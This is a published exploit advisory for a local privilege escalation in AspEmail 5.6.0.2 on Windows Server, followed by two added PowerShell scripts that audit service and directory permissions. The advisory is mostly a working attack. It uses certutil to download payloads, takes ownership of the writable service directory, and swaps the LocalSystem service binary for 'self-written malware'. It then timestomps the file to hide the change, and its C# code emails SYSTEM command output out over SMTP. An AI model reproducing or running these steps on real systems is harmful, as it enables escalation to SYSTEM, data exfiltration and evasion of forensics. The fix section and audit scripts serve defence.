AspEmail 5.6.0.2 Weak Permissions / Local Privilege Escalation

17 Apr 2023 | Reported by Zer0FauLT | Type: packetstorm | Source: packetstormsecurity.com

AspEmail 5.6.0.2 Weak Permissions / Local Privilege Escalation. The exploit was tested on Windows Server 2016 and 2019; the finding is a binary permission vulnerability (the directory holding the service binary is writable by Everyone).

Code
```text
####################################################################################################################  
# Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation #  
# Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability] #  
# Date: 13/04/2023 #  
# Exploit Author: Zer0FauLT [[email protected]] #  
# Vendor Homepage: https://www.aspemail.com #  
# Software Link: https://www.aspemail.com/download.html #  
# Product: AspEmail #  
# Version: AspEmail 5.6.0.2 and all #  
# Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU #  
# Tested on: Windows Server 2016 and Windows Server 2019 #  
# CVE : 0DAY #  
####################################################################################################################  
  
# ==================================================================================================================  
  
[+] C:\PenTest>whoami /priv  
  
PRIVILEGES INFORMATION  
----------------------  
  
Privilege Name Description State   
============================= ========================================= ========  
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled  
SeChangeNotifyPrivilege Bypass traverse checking Enabled   
SeImpersonatePrivilege Impersonate a client after authentication Enabled   
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled  
  
# ==================================================================================================================  
  
* First, we test whether the AspEmail service is active.  
* With normal user rights we list the processes running on the system and check whether the process of the relevant service is present:  
  
[+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe  
EmailAgent.exe 4400 Persits Software EmailAgent  
  
or   
  
[+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe  
EmailAgent64.exe 4400 Persits Software EmailAgent  
  
* The process of the "Persits Software EmailAgent" service is in state "RUNNING".   
* So the AspEmail service is active.  
  
# ==================================================================================================================  
  
* We will need these:  
  
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit  
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe"  
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe"  
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat"  
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1"  
  
# ==================================================================================================================  
  
[+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"  
  
Name: Persits Software EmailAgent  
ImagePath : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email  
Agent.exe" /run  
User : LocalSystem  
ModifiablePath : C:\Program Files (x86)\Persits Software\AspEmail\BIN  
IdentityReference : Everyone  
Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory,   
AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile,   
ReadExtendedAttributes, DeleteChild, Execute/Traverse  
Status : Unknown  
UserCanStart : False  
UserCanStop : False  
  
[+] C:\PenTest>del PrivescCheck.ps1  
  
* Our checks flagged a "Binary Permission Vulnerability" in the "Persits Software EmailAgent" service: the directory holding the service binary is modifiable by Everyone, while the service itself runs as LocalSystem.  
  
# ================================================================================================================== #  
  
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"  
  
Successfully processed 0 files; Failed processing 1 files  
C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.  
  
* We do not have permission to access the parent directory or its other subdirectories.  
  
# ==================================================================================================================  
  
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"  
  
C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)  
DeepSecLab\psacln:(I)(OI)(CI)(N)  
DeepSecLab\psaadm:(I)(OI)(CI)(N)  
DeepSecLab\psaadm_users:(I)(OI)(CI)(N)  
BUILTIN\Administrators:(I)(F)  
CREATOR OWNER:(I)(OI)(CI)(IO)(F)  
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)  
NT SERVICE\TrustedInstaller:(I)(CI)(F)  
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)  
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)  
BUILTIN\Users:(I)(OI)(CI)(RX)  
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)  
  
* Unlike the other directories, we have full control (Everyone:(OI)(CI)(F)) over the service's "BIN" directory.   
* In Linux terms this is chmod 0777 (rwxrwxrwx).  
  
# ==================================================================================================================  
  
[+] C:\PenTest>wmic path Win32_LogicalFileSecuritySetting where Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID  
  
__PATH   
  
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"   
  
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544"  
root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-32-544" Win32_SID Win32_SID 2 Administrators {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0} BUILTIN S-1-5-32-544 16  
[EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators  
  
* So "EmailAgent.exe" was installed by an administrator and its owner is BUILTIN\Administrators.  
  
# ==================================================================================================================  
  
* Now we will take ownership of this directory as we will execute our operations under the "BIN" directory.  
  
[+] C:\PenTest>whoami  
DeepSecLab\Hacker  
  
[+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN"  
SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".  
  
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F  
  
processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN  
Successfully processed 1 files; Failed processing 0 files  
  
* All commands completed successfully. We now have full control over this directory.   
  
# ==================================================================================================================  
  
* Now we replace the EmailAgent binary with a self-written malware.   
* We take care not to damage any files while doing this, so that every change can easily be undone.  
  
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe  
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe  
  
# ==================================================================================================================  
  
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir  
Volume in drive C has no label.  
Volume Serial Number is 0C8A-5291  
  
Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin  
  
14.04.2023 16:47 <DIR> .  
14.04.2023 16:47 <DIR> ..  
01.03.2004 15:55 143.360 AspEmail.dll  
25.02.2004 16:23 188.416 AspUpload.dll  
13.04.2023 22:00 12.288 EmailAgent.exe <<<=== Renamed for EmailAgentPrivESC.exe  
24.09.2003 09:22 139.264 EmailAgentCfg.cpl  
24.09.2003 09:25 94.208 EmailLogger.dll  
24.09.2003 09:21 167.936 Null.EmailAgent.exe  
6 File(s) 745.472 bytes  
2 Dir(s) 165.936.717.824 bytes free  
  
# ==================================================================================================================  
  
* Now we set the Last Modified, Creation and Last Accessed timestamps of the new file.  
  
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"  
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe  
  
# ==================================================================================================================  
  
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir  
Volume in drive C has no label.  
Volume Serial Number is 0C8A-5291  
  
Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin  
  
14.04.2023 16:47 <DIR> .  
14.04.2023 16:47 <DIR> ..  
01.03.2004 15:55 143.360 AspEmail.dll  
25.02.2004 16:23 188.416 AspUpload.dll  
24.09.2003 09:21 12.288 EmailAgent.exe  
24.09.2003 09:22 139.264 EmailAgentCfg.cpl  
24.09.2003 09:25 94.208 EmailLogger.dll  
24.09.2003 09:21 167.936 Null.EmailAgent.exe  
6 File(s) 745.472 bytes  
2 Dir(s) 165.936.717.824 bytes free  
  
[24.09.2003 09:21] 12.288 EmailAgent.exe  
[24.09.2003 09:21] 167.936 Null.EmailAgent.exe  
  
* Time manipulation is done: both files now look as if they were placed there at the same time, long ago.  
  
# ==================================================================================================================  
  
* Now we check the owner of the replaced binary.  
  
[+] C:\PenTest>wmic path Win32_LogicalFileSecuritySetting where Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID  
  
__PATH   
  
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"   
  
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" Win32_SID Win32_SID 2 Hacker {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0} DeepSecLab S-1-5-21-3674093405-176013069-2091862131-1511 28  
  
[+] wmic useraccount where sid="S-1-5-21-3674093405-176013069-2091862131-1511" get name  
  
Name   
  
DeepSecLab\Hacker   
  
EmailAgent.exe Owner: DeepSecLab\Hacker  
  
# =================================================================================================================#  
# #  
####################################################################################################################  
# #[EmailAgent.exe]# #  
####################################################################################################################  
# #   
#  
* We program this malware so that when the server is rebooted (i.e. when the services restart), #  
* it is triggered and executes the commands we want, #  
* and then sends the resulting output to the email address we specified. #  
#  
using System; #  
using System.Linq; #  
using System.Text; #  
using System.Diagnostics; #  
using System.IO; #  
using System.Collections; #  
#  
namespace CliToolSpace #  
{ #  
class _Main #  
{ #  
static void Main(string[] args) #  
{ #  
Cli commandLine = new Cli(); #  
commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat"); #  
commandLine.Execute(); #  
commandLine.ToFile(@"C:\Windows\Temp\"); #  
} #  
} #  
} #  
#  
# #  
####################################################################################################################  
# #[Mail.exe]# #  
####################################################################################################################  
# #  
#  
using System; #  
using System.Net.Mail; #  
using System.Net; #  
SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com"); #  
var mail = new MailMessage(); #  
mail.From = new MailAddress("[email protected]"); #  
mail.To.Add("[email protected]"); #  
mail.Subject = "Trigger Successful!"; #  
mail.IsBodyHtml = true; #  
string htmlBody; #  
htmlBody = "<strong>This server has been rebooted.</strong>"; #  
mail.Body = htmlBody; #  
Attachment attachment; #  
attachment = new Attachment(@"C:\Windows\Temp\Export.txt"); #  
mail.Attachments.Add(attachment); #  
SmtpServer.Port = 587; #  
SmtpServer.UseDefaultCredentials = false; #  
SmtpServer.Credentials = new System.Net.NetworkCredential("[email protected]","p@ssw0rd123"); #  
SmtpServer.EnableSsl = true; #  
SmtpServer.Timeout = int.MaxValue; #  
SmtpServer.Send(mail); #  
#  
# #  
####################################################################################################################  
# #[Run.bat]# #  
####################################################################################################################  
# #  
#  
whoami > C:\Windows\Temp\Export.txt #  
cd C:\Program Files (x86)\Persits Software\AspEmail\Bin #  
del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe #  
cd c:\Windows\Tasks #  
del Run.bat & del Mail.exe #  
#  
# #  
####################################################################################################################  
# #  
[+]Trigger Successful![+] #  
#  
[+] C:\PenTest>systeminfo | findstr "Boot Time" #  
System Boot Time: 13.04.2022, 07:46:06 #  
#  
# #  
####################################################################################################################  
#[Export.txt]# #  
####################################################################################################################  
# #  
#  
NT AUTHORITY\SYSTEM #  
#  
# #  
####################################################################################################################  
# #   
# ==================================================================================================================  
# ...|||[FIX]|||... #  
# ==================================================================================================================  
# [+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+] #  
# =================================================================================================================#  
  
[+] C:\Administrator>sc qc "Persits Software EmailAgent"  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: Persits Software EmailAgent  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : Persits Software EmailAgent  
DEPENDENCIES : rpcss  
SERVICE_START_NAME : LocalSystem  
  
# ==================================================================================================================  
  
[+] C:\Administrator>sc sdshow "Persits Software EmailAgent"  
  
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)  
  
# ==================================================================================================================  
  
[+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula  
  
Accesschk v6.15 - Reports effective permissions for securable objects  
Copyright (C) 2006-2022 Mark Russinovich  
Sysinternals - www.sysinternals.com  
  
Persits Software EmailAgent  
Medium Mandatory Level (Default) [No-Write-Up]  
RW NT AUTHORITY\SYSTEM  
SERVICE_ALL_ACCESS  
RW BUILTIN\Administrators  
SERVICE_ALL_ACCESS  
  
# ==================================================================================================================  
  
[+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET  
  
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"  
  
Successfully processed 0 files; Failed processing 1 files  
C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.  
  
DONE!  
  
# ==================================================================================================================  
  
[+] C:\Administrator>sc stop "Persits Software EmailAgent"  
  
[+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"  
  
* These commands are optional; they stop and restart the "Persits Software EmailAgent" service. Since the vulnerability is fixed, I don't think this is necessary anymore.  
  
# ==================================================================================================================  
```
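The PrivescCheck and ICACLS output in the advisory above shows the weakness in one place: an `Everyone:(OI)(CI)(F)` entry, not inherited, on the directory of a binary that the service control manager starts as LocalSystem. The following audit script is an added example, not code from the advisory, from PrivescCheck, or from AspEmail; it walks every installed service and reports any binary whose file or parent directory grants write-class rights to a low-privileged principal. It assumes it is run as an administrator in Windows PowerShell 5.1 or PowerShell 7 on Windows, reads everything from the local machine and modifies nothing. The principal list, the write mask and the column names are this example's own choices.

```powershell
# Added audit script (not part of the advisory or of AspEmail): enumerate every
# installed service and flag binaries whose file or parent directory grants write
# rights to low-privileged principals. Run as an administrator; nothing is modified.

# SIDs of principals that must never hold write rights on a service binary or its
# directory. Matching on SIDs rather than names keeps the check working on
# localized systems.
$LowPrivSids = @(
    'S-1-1-0',      # Everyone (the ACE the advisory found on the BIN directory)
    'S-1-5-32-545', # BUILTIN\Users
    'S-1-5-11',     # Authenticated Users
    'S-1-5-4',      # INTERACTIVE
    'S-1-15-2-1'    # ALL APPLICATION PACKAGES
)

# Any of these rights lets the holder replace or alter the binary, or rewrite the ACL.
$WriteMask = [int]([System.Security.AccessControl.FileSystemRights]::WriteData -bor
    [System.Security.AccessControl.FileSystemRights]::AppendData -bor
    [System.Security.AccessControl.FileSystemRights]::Delete -bor
    [System.Security.AccessControl.FileSystemRights]::DeleteSubdirectoriesAndFiles -bor
    [System.Security.AccessControl.FileSystemRights]::WriteAttributes -bor
    [System.Security.AccessControl.FileSystemRights]::WriteExtendedAttributes -bor
    [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
    [System.Security.AccessControl.FileSystemRights]::TakeOwnership)

function Get-ServiceBinaryPath {
    # Extract the executable from a service PathName such as
    #   "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    $expanded = [Environment]::ExpandEnvironmentVariables($PathName)
    if ($expanded -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($expanded -match '^\s*(\S+)') { return $Matches[1] }
    return $null
}

function Test-WeakAce {
    # True when an Allow ACE gives a low-privileged principal any write-class right.
    param([System.Security.AccessControl.FileSystemAccessRule]$Ace)
    if ($Ace.AccessControlType -ne [System.Security.AccessControl.AccessControlType]::Allow) { return $false }
    try {
        $sid = $Ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
    } catch { return $false }
    if ($LowPrivSids -notcontains $sid) { return $false }
    $rights = [int]$Ace.FileSystemRights
    # 0x10000000 = GENERIC_ALL, 0x40000000 = GENERIC_WRITE: generic bits Get-Acl leaves unmapped.
    return (($rights -band $WriteMask) -ne 0) -or (($rights -band 0x50000000) -ne 0)
}

function Find-WeakServiceBinaryPermissions {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $exe = Get-ServiceBinaryPath -PathName $svc.PathName
        if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { continue }
        $dir = Split-Path -LiteralPath $exe -Parent
        # Check the binary itself and the directory it lives in: a writable directory
        # is enough to rename the original and drop a replacement, as the advisory does.
        foreach ($target in @($exe, $dir)) {
            $acl = Get-Acl -LiteralPath $target -ErrorAction SilentlyContinue
            if (-not $acl) { continue }
            foreach ($ace in $acl.Access) {
                if (-not (Test-WeakAce -Ace $ace)) { continue }
                [pscustomobject]@{
                    Service   = $svc.Name
                    RunsAs    = $svc.StartName
                    Target    = $target
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                    Inherited = $ace.IsInherited
                    # A signature check helps spot a replaced binary; unsigned vendor
                    # binaries simply show NotSigned and need a hash comparison instead.
                    Signature = (Get-AuthenticodeSignature -LiteralPath $exe).Status
                }
            }
        }
    }
}

Find-WeakServiceBinaryPermissions | Format-Table -AutoSize
```

On a host configured like the one in the advisory, this would report the service `Persits Software EmailAgent` running as `LocalSystem`, target `...\AspEmail\BIN`, principal `Everyone`, rights `FullControl`, and `Inherited` false, which is exactly the explicit `(OI)(CI)(F)` entry that `ICACLS` printed. The `Inherited` column matters for the fix: `ICACLS /RESET`, as used in the advisory, replaces explicit entries with inherited ones, so an explicit Everyone entry disappears while inherited defaults stay.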

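The FIX section reads the service object's security descriptor with `sc sdshow` and `accesschk`, and finds that only SYSTEM and Administrators hold write access on the service itself. That distinction is worth making explicit: the service DACL was never the problem, the file system ACL of the binary's directory was. The script below is an added example, not part of the advisory or of AspEmail, that decodes the SDDL string exactly as `sc sdshow` printed it and reports which principals hold rights that would let them reconfigure, stop or start the service, or rewrite its ACL. It parses the string offline with the .NET `RawSecurityDescriptor` class, so it needs no access to the service control manager; the right-name table and the "dangerous" mask are this example's own choices, taken from the documented service access-right values.

```powershell
# Added example (not part of the advisory): decode a service SDDL string and report
# which principals can change, stop/start or re-ACL the service. Runs offline.

# Service-specific access-mask bits plus the standard rights present in this DACL.
# The two-letter codes are the SDDL abbreviations seen in the sc sdshow output.
$ServiceRights = [ordered]@{
    SERVICE_QUERY_CONFIG         = 0x0001   # CC
    SERVICE_CHANGE_CONFIG        = 0x0002   # DC
    SERVICE_QUERY_STATUS         = 0x0004   # LC
    SERVICE_ENUMERATE_DEPENDENTS = 0x0008   # SW
    SERVICE_START                = 0x0010   # RP
    SERVICE_STOP                 = 0x0020   # WP
    SERVICE_PAUSE_CONTINUE       = 0x0040   # DT
    SERVICE_INTERROGATE          = 0x0080   # LO
    SERVICE_USER_DEFINED_CONTROL = 0x0100   # CR
    DELETE                       = 0x10000  # SD
    READ_CONTROL                 = 0x20000  # RC
    WRITE_DAC                    = 0x40000  # WD
    WRITE_OWNER                  = 0x80000  # WO
}

# Rights that let a principal point the service at another binary, bounce it,
# delete it, or rewrite its ACL. Anything else is read-only from a defender's view.
$DangerousMask = 0x0002 -bor 0x0010 -bor 0x0020 -bor 0x10000 -bor 0x40000 -bor 0x80000

function Get-ServiceDaclReport {
    param([Parameter(Mandatory)][string]$Sddl)
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($Sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        # Only CommonAce entries carry a SID and an access mask; skip anything else.
        if ($ace -isnot [System.Security.AccessControl.CommonAce]) { continue }
        $names = foreach ($r in $ServiceRights.GetEnumerator()) {
            if (($ace.AccessMask -band $r.Value) -ne 0) { $r.Key }
        }
        # Resolve the SID to a name where the local machine can; fall back to the SID.
        $principal = $ace.SecurityIdentifier.Value
        try { $principal = $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value } catch { }
        [pscustomobject]@{
            Principal = $principal
            AceType   = $ace.AceType
            Dangerous = ($ace.AceType -eq 'AccessAllowed') -and (($ace.AccessMask -band $DangerousMask) -ne 0)
            Rights    = ($names -join ',')
        }
    }
}

# SDDL exactly as reported by `sc sdshow "Persits Software EmailAgent"` in the advisory.
$AdvisorySddl = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)'
Get-ServiceDaclReport -Sddl $AdvisorySddl | Format-Table -AutoSize
```

For the advisory's string the report marks only `NT AUTHORITY\SYSTEM` (start/stop) and `BUILTIN\Administrators` (everything, including `SERVICE_CHANGE_CONFIG`, `WRITE_DAC` and `WRITE_OWNER`) as dangerous; `INTERACTIVE` and `SERVICE` hold only query and interrogate rights, matching the `accesschk64 -wuvc` output. Running the same function over `(sc.exe sdshow <name>)` output for every service is a cheap complement to the file-ACL audit: the two checks cover the two distinct ways an unprivileged user can end up controlling what LocalSystem executes.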